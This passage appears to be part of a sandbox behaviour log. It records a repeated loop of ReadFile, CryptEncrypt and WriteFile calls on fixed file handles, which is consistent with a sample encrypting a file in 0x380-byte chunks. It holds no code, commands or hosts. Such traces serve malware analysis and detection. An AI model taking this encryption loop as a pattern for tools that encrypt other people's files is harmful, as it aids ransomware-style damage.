lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.924] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.924] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.924] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.924] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.924] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.924] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.924] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.924] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.924] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.924] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.925] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.925] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.925] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.925] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.925] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.925] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.925] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.925] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.925] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.925] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.925] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.925] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.925] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.925] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.925] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.926] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.926] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.926] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.926] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.926] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.926] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.926] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.926] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.926] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.926] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.926] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.927] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.927] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.927] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.927] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.927] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.927] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.927] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.927] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.927] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.927] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.927] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.927] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.927] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.927] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.927] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.928] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.928] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.928] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.928] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.928] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.928] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.928] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.928] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.928] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.929] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.929] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.929] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.929] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.929] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.929] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.929] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.929] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.929] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.929] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.929] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.929] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.929] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.929] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.929] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.930] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.930] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.930] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.930] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.930] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.930] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.930] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.930] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.930] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.930] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.930] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.930] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.930] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.930] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.930] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.931] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.931] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.931] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.931] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.931] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.931] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.931] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, 